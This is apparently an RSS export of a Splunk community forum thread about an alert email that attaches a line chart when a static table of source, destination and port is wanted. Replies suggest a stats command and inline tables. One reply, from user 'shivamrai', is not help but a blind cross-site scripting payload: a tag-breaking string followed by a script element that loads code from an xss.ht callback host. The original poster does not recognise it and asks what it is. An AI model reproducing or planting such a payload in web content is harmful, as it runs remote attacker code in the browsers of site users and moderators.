<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: Alerts, wrong visualization in the attachment in Alerting</title>
    <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566580#M12999</link>
    <description>&lt;P&gt;Yes, I was using this stats command.&lt;/P&gt;&lt;P&gt;My concern is about the chart, so it seems this is the only way:&lt;BR /&gt;to not attach PDF and include the Table inline.&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Thank you very much&lt;/P&gt;</description>
    <pubDate>Fri, 10 Sep 2021 07:57:09 GMT</pubDate>
    <dc:creator>a_n</dc:creator>
    <dc:date>2021-09-10T07:57:09Z</dc:date>
    <item>
      <title>Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566073#M12983</link>
      <description>&lt;P&gt;Hello All,&lt;/P&gt;&lt;P&gt;I have several alerts which send email notifications.&lt;/P&gt;&lt;P&gt;I know it might be very basic, but I need your help.&lt;/P&gt;&lt;P&gt;One alert is to specify if a local host has accessed a blacklisted IP.&lt;BR /&gt;So I expect to have a table with:&lt;BR /&gt;Src, Dest, Port&amp;nbsp;&lt;BR /&gt;The search returns table, but I do not understand why does it attach a Line-Chart diagram!&lt;BR /&gt;I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.&lt;/P&gt;&lt;P&gt;I have even changed the search and used Table instead of stats.&lt;/P&gt;&lt;P&gt;Please advise.&lt;/P&gt;&lt;P&gt;Thank you&lt;/P&gt;</description>
      <pubDate>Tue, 07 Sep 2021 07:34:51 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566073#M12983</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-07T07:34:51Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566553#M12994</link>
      <description>&lt;P&gt;Any one can assist please?&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 05:46:35 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566553#M12994</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-10T05:46:35Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566555#M12995</link>
      <description>&lt;P&gt;Can you post your query + those visualisations?&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 05:58:28 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566555#M12995</guid>
      <dc:creator>isoutamo</dc:creator>
      <dc:date>2021-09-10T05:58:28Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566557#M12996</link>
      <description>&lt;P&gt;Hi,&lt;BR /&gt;search is like:&lt;BR /&gt;index=FW&lt;BR /&gt;|table Src,Dst,pt&lt;BR /&gt;|dedup Src,Dst,pt&lt;BR /&gt;|rename Src as "Source",Dst as "Destination", pt as "Port"&lt;BR /&gt;&lt;BR /&gt;chart is like:&lt;BR /&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screen Shot 2021-09-10 at 9.01.22 AM.png" style="width: 999px;"&gt;&lt;img src="https://community.splunk.com/t5/image/serverpage/image-id/15936i03DF72F11CB7E85C/image-size/large?v=v2&amp;amp;px=999" role="button" title="Screen Shot 2021-09-10 at 9.01.22 AM.png" alt="Screen Shot 2021-09-10 at 9.01.22 AM.png" /&gt;&lt;/span&gt;&lt;/P&gt;&lt;P&gt;Which I do not need it.&lt;BR /&gt;I managed for now as a workaround to Not attache PDF and use Inline Table.&lt;/P&gt;&lt;P&gt;Is it the only way to do this?&lt;BR /&gt;Thank you&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 06:04:04 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566557#M12996</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-10T06:04:04Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566563#M12997</link>
      <description>&lt;P&gt;I have added the search and chart, but seems in wrong level.&lt;/P&gt;&lt;P&gt;Please check.&lt;/P&gt;&lt;P&gt;Thank you&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 06:22:24 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566563#M12997</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-10T06:22:24Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566564#M12998</link>
      <description>&lt;P&gt;Maybe you can change you table + deduce to&lt;/P&gt;&lt;LI-CODE lang="markup"&gt;...
| stats count by Src, Dst, pt
...&lt;/LI-CODE&gt;&lt;P&gt;And as you said don't attach pdf etc. into alert email, just link and/or inline.&lt;/P&gt;&lt;P&gt;r. Ismo&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 06:23:58 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566564#M12998</guid>
      <dc:creator>isoutamo</dc:creator>
      <dc:date>2021-09-10T06:23:58Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566580#M12999</link>
      <description>&lt;P&gt;Yes, I was using this stats command.&lt;/P&gt;&lt;P&gt;My concern is about the chart, so it seems this is the only way:&lt;BR /&gt;to not attach PDF and include the Table inline.&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Thank you very much&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 07:57:09 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566580#M12999</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-10T07:57:09Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566586#M13000</link>
      <description>&lt;P&gt;"&amp;gt;&amp;lt;script src=&lt;A href="https://shivamraixssht.xss.ht" target="_blank"&gt;https://shivamraixssht.xss.ht&lt;/A&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 08:37:40 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566586#M13000</guid>
      <dc:creator>shivamrai</dc:creator>
      <dc:date>2021-09-10T08:37:40Z</dc:date>
    </item>
    <item>
      <title>Re: Alerts, wrong visualization in the attachment</title>
      <link>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566595#M13003</link>
      <description>&lt;P&gt;Hi,&lt;BR /&gt;Sorry, I am afraid I did not get what is this?&lt;BR /&gt;would you please elaborate?&lt;BR /&gt;Thank you&lt;/P&gt;</description>
      <pubDate>Fri, 10 Sep 2021 09:22:20 GMT</pubDate>
      <guid>https://community.splunk.com/t5/Alerting/Alerts-wrong-visualization-in-the-attachment/m-p/566595#M13003</guid>
      <dc:creator>a_n</dc:creator>
      <dc:date>2021-09-10T09:22:20Z</dc:date>
    </item>
  </channel>
</rss>

